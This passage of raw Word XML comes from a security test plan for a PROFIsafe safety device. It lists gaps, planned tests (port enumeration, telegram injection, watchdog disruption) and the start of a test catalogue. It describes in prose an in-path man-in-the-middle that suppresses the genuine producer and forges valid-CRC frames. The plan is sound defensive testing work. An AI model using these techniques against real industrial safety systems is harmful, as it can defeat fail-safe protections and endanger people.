        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> passivation (CR 3.6)</w:t>
      </w:r>
      <w:r w:rsidR="00785C21">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00761122">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Loss/staleness of the legitimate producer beyond F_WD_Time (default 150 ms, SRIO-1210/1857) drives channel- or device-granular passivation (SRIO-9021); re-integration requires explicit acknowledgement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762768D7" w14:textId="237D960A" w:rsidR="00761122" w:rsidRPr="005801D9" w:rsidRDefault="00761122" w:rsidP="00706D72">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00761122">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Environmental control (CCSC-2)</w:t>
      </w:r>
      <w:r w:rsidR="00416953">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00761122">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> “Safe zone behind a firewall” (SRIO-9402). This is an organisational/compensating control, not a device function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA69149" w14:textId="49FF4487" w:rsidR="00826929" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Identified Gap: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC84C65" w14:textId="60D7F421" w:rsidR="005801D9" w:rsidRDefault="005801D9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005801D9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G-1 (device-level, TESTABLE)</w:t>
      </w:r>
      <w:r w:rsidR="00AF6F63">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00AF6F63" w:rsidRPr="00AF6F63">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Freedom-from-hazard against a connecting device is a device function to be positively demonstrated: a mis-addressed or CRC-invalid telegram is rejected, and loss of the legitimate channel resolves to passivation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F29D668" w14:textId="5978F0C7" w:rsidR="00CB3968" w:rsidRDefault="005801D9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005801D9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">G-2 (environmental, </w:t>
      </w:r>
      <w:r w:rsidR="007B238D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>boundary only</w:t>
      </w:r>
      <w:r w:rsidRPr="005801D9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00A75363">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00A75363" w:rsidRPr="00A75363">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Authenticity ultimately rests on the black-channel assumption. Because F_Source_Add is not checked under Address Type 1 and CRC-Seed24/32 is a public, non-secret value in the GSD, the CRC is not a cryptographic authenticity barrier. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330FDFAD" w14:textId="1EA3BE59" w:rsidR="00DB074F" w:rsidRDefault="00CB3968" w:rsidP="00484325">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00A75363" w:rsidRPr="00A75363">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>echnical refinement: a naive side-injection of a valid replayed frame while the genuine producer is still active does NOT succeed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00A75363" w:rsidRPr="00A75363">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> two producers collide on the consecutive number, and the consumer passivates. The genuine residual risk is therefore a full in-path MITM that suppresses the legitimate producer and takes over the consecutive number, not simple parallel injection. Device-level testing can only characterise this boundary; it cannot close it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B36B0A" w14:textId="77777777" w:rsidR="00484325" w:rsidRDefault="00484325" w:rsidP="00484325">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="675EA01C" w14:textId="77777777" w:rsidR="007B238D" w:rsidRDefault="007B238D" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F8EA872" w14:textId="77777777" w:rsidR="007B238D" w:rsidRDefault="007B238D" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C0955C8" w14:textId="77777777" w:rsidR="007B238D" w:rsidRPr="00826929" w:rsidRDefault="007B238D" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="239295B2" w14:textId="7B8F5CED" w:rsidR="009C0A46" w:rsidRPr="00DB074F" w:rsidRDefault="00DB074F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB074F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 2</w:t>
      </w:r>
      <w:r w:rsidR="00FF7917">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB074F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Methodological Test Planning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663C3ED4" w14:textId="59667FFD" w:rsidR="00DB074F" w:rsidRDefault="00DB074F" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>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48575E" w14:paraId="3A6892BF" w14:textId="77777777" w:rsidTr="004369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8034521" w14:textId="77777777" w:rsidR="0048575E" w:rsidRDefault="0048575E" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="707FD58E" w14:textId="77777777" w:rsidR="0048575E"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7330AF3B" w14:textId="77777777" w:rsidR="0048575E"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2DBF5402" w14:textId="77777777" w:rsidR="0048575E"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2006A805" w14:textId="77777777" w:rsidR="0048575E"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7F5798" w:rsidRPr="007F5798" w14:paraId="1289F2EB"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8D27570" w14:textId="77777777" w:rsidR="007F5798" w:rsidRDefault="007F5798" w:rsidP="007F5798">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1CF0318A" w14:textId="6128E99F" w:rsidR="007F5798" w:rsidRPr="007F5798" w:rsidRDefault="007F579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B074F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Baseline PROFIsafe exchange with correct F_Dest_Add; verify qualifier = good, outputs follow control byte</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45A94B88" w14:textId="5CB5D121" w:rsidR="007F5798" w:rsidRPr="007F5798"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B074F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Functional implementation of CR 3.1 in normal operation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0AC3766D" w14:textId="69B9C25B" w:rsidR="007F5798" w:rsidRPr="007F5798"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B074F">
              <w:t>Requirements-based verification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07A2FB28" w14:textId="393165FA" w:rsidR="007F5798" w:rsidRPr="007F5798"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A6DAB">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F5798" w:rsidRPr="00D258C9" w14:paraId="6885065B"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5138DC7D" w14:textId="77777777" w:rsidR="007F5798" w:rsidRDefault="007F5798" w:rsidP="007F5798">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D6F8D51" w14:textId="7F942872" w:rsidR="007F5798" w:rsidRPr="00D258C9" w:rsidRDefault="005F72BD" w:rsidP="00D258C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2BD">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Enumerate what a connecting device reaches on the DUT (services/ports on the non-safety path) vs. the approved matrix</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B8D111B" w14:textId="7A0B3FB6" w:rsidR="007F5798" w:rsidRPr="00D258C9"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4581A">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Attack-surface of the non-safety path = evidence for Gap G-2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DD5E085" w14:textId="0DCCEC89" w:rsidR="007F5798" w:rsidRPr="00D258C9"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36999">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>NIST SP 800-115 §4.2/4.3; ifm framework CM-001 (Nmap)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5113327F" w14:textId="505028C5" w:rsidR="007F5798" w:rsidRPr="00D258C9"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4581A">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="00B4581A">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F5798" w:rsidRPr="00D0764E" w14:paraId="5C5A082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1B131" w14:textId="77777777" w:rsidR="007F5798" w:rsidRDefault="007F5798" w:rsidP="007F5798">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="645CCA75" w14:textId="4B29F27C" w:rsidR="0043440A"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3440A">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Codename/CRC-mismatch </w:t>
            </w:r>
            <w:r w:rsidR="0060116A">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>s</w:t>
            </w:r>
            <w:r w:rsidRPr="0043440A">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">injection: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FAB8799" w14:textId="77777777" w:rsidR="0043440A"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3440A">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">(a) mis-addressed telegram, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2307805E" w14:textId="56CFDF04" w:rsidR="007F5798" w:rsidRPr="0043440A"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3440A">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(b) bit-flipped payload/CRC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71D44846" w14:textId="2164A914" w:rsidR="007F5798" w:rsidRPr="00D0764E" w:rsidRDefault="00C132E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132E8">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Effectiveness of CRC + consumer-ID verification </w:t>
            </w:r>
            <w:r w:rsidRPr="00C132E8">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="00C132E8">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> passivation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B5E2BC0" w14:textId="446E3372" w:rsidR="005238DC"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238DC">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>MITRE ATT&amp;CK for ICS T0842/</w:t>
            </w:r>
            <w:r w:rsidR="00730417">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>1692</w:t>
            </w:r>
            <w:r w:rsidR="00D9486D">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.002</w:t>
            </w:r>
            <w:r w:rsidRPr="005238DC">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77E5931F" w14:textId="53E8219B" w:rsidR="007F5798" w:rsidRPr="00D0764E"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238DC">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>NIST SP 800-115 §5.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D4A0978" w14:textId="3D15C8FA" w:rsidR="007F5798" w:rsidRPr="00D0764E" w:rsidRDefault="00BB3ADF"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B3ADF">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV-4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D53221" w:rsidRPr="00BC7A66" w14:paraId="237FAC33"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4D4795B4" w14:textId="727DEF0A" w:rsidR="00D53221" w:rsidRDefault="0043440A" w:rsidP="007F5798">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E46E851" w14:textId="5D4B2161" w:rsidR="00D53221" w:rsidRPr="00E932F8" w:rsidRDefault="00BC7A66"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C7A66">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>In-path MITM boundary: suppress genuine producer, take over consecutive number, inject valid-CRC frame</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="114B41AC" w14:textId="223E93F1" w:rsidR="00D53221" w:rsidRPr="00D0764E"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F3D7B">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Demonstrates the true residual boundary of G-2 (documented, not scored as device FAIL)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F231996" w14:textId="70392C33" w:rsidR="00D53221" w:rsidRPr="00435795" w:rsidRDefault="00657718"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57718">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>MITRE ATT&amp;CK for ICS T0830 (Adversary-in-the-Middle); PROFIsafe theory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50994883" w14:textId="32E94B3A" w:rsidR="00D53221" w:rsidRPr="00BB3ADF"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SVV-4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F5798" w:rsidRPr="00035F89" w14:paraId="45FDA76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4F7858E" w14:textId="46A161D9" w:rsidR="007F5798" w:rsidRDefault="0043440A" w:rsidP="007F5798">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26CB53B5" w14:textId="138AE57A" w:rsidR="007F5798" w:rsidRPr="00035F89" w:rsidRDefault="008A6D57"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A6D57">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Disrupt the black channel &gt; F_WD_Time; observe passivation + acknowledged re-integration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6157064B" w14:textId="7A0CABB8" w:rsidR="007F5798" w:rsidRPr="00035F89" w:rsidRDefault="007D352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D3529">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Connection-induced disruption resolves to the safe state (fail-safe outcome of RQ-001)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62994648" w14:textId="55BE52A0" w:rsidR="007F5798" w:rsidRPr="00035F89" w:rsidRDefault="00035F8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B074F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>MITRE ATT&amp;CK for ICS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB074F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> T0814; PROFIsafe watchdog theory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D2A2C99" w14:textId="3159E699" w:rsidR="007F5798" w:rsidRPr="00035F89" w:rsidRDefault="00B81486"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81486">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV-2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6274DB05" w14:textId="77777777" w:rsidR="0048575E" w:rsidRDefault="0048575E" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4250E11E" w14:textId="77777777" w:rsidR="00864878" w:rsidRPr="00DB074F" w:rsidRDefault="00864878" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A1D0A89" w14:textId="7B1BBFBE" w:rsidR="00DB074F" w:rsidRPr="00DB074F" w:rsidRDefault="00DB074F" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB074F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3 </w:t>
      </w:r>
      <w:r w:rsidR="00635873">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB074F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Two-Level Test Catalog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D80DB64" w14:textId="5FD3C309" w:rsidR="00DB074F" w:rsidRPr="00635873" w:rsidRDefault="00DB074F" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="336D7AAC" w14:textId="3D10BBE5" w:rsidR="00DB074F" w:rsidRPr="00DB074F" w:rsidRDefault="00DB074F" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB074F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TC-RQ001-01</w:t>
      </w:r>
      <w:r w:rsidR="00635873">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB074F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> PROFIsafe Integrity in Normal Operation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413BA8E8" w14:textId="47F0E2EB" w:rsidR="00635873" w:rsidRDefault="00DB074F" w:rsidP="00635873">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB074F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Level 1 </w:t>
      </w:r>
      <w:r w:rsidR="00635873">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB074F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-U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35873" w14:paraId="119FE4EB" w14:textId="77777777" w:rsidTr="008065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6557C0" w14:textId="31B13FC7" w:rsidR="00635873" w:rsidRDefault="00635873" w:rsidP="00DB074F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FE43A5E" w14:textId="65D02F96" w:rsidR="00635873" w:rsidRDefault="00635873" w:rsidP="00DB074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35873" w14:paraId="2FB85EDF"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E1DCAC3" w14:textId="238295AE" w:rsidR="00635873" w:rsidRDefault="00635873" w:rsidP="00DB074F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Test Case ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17F867F2" w14:textId="0C121C2C" w:rsidR="00635873" w:rsidRDefault="003306B2" w:rsidP="00DB074F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DB074F">
              <w:t>TC-RQ001-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635873" w14:paraId="7F0E8E05"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4F1C4E14" w14:textId="2B501E43" w:rsidR="00635873" w:rsidRDefault="005905A3" w:rsidP="00DB074F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Traceability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BEC3088" w14:textId="6BA23062" w:rsidR="00635873" w:rsidRPr="003306B2" w:rsidRDefault="003306B2"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306B2">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>RQ-001 (EHSR 1.1.9) → CR 3.1 → Asset C (+ Asset A)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
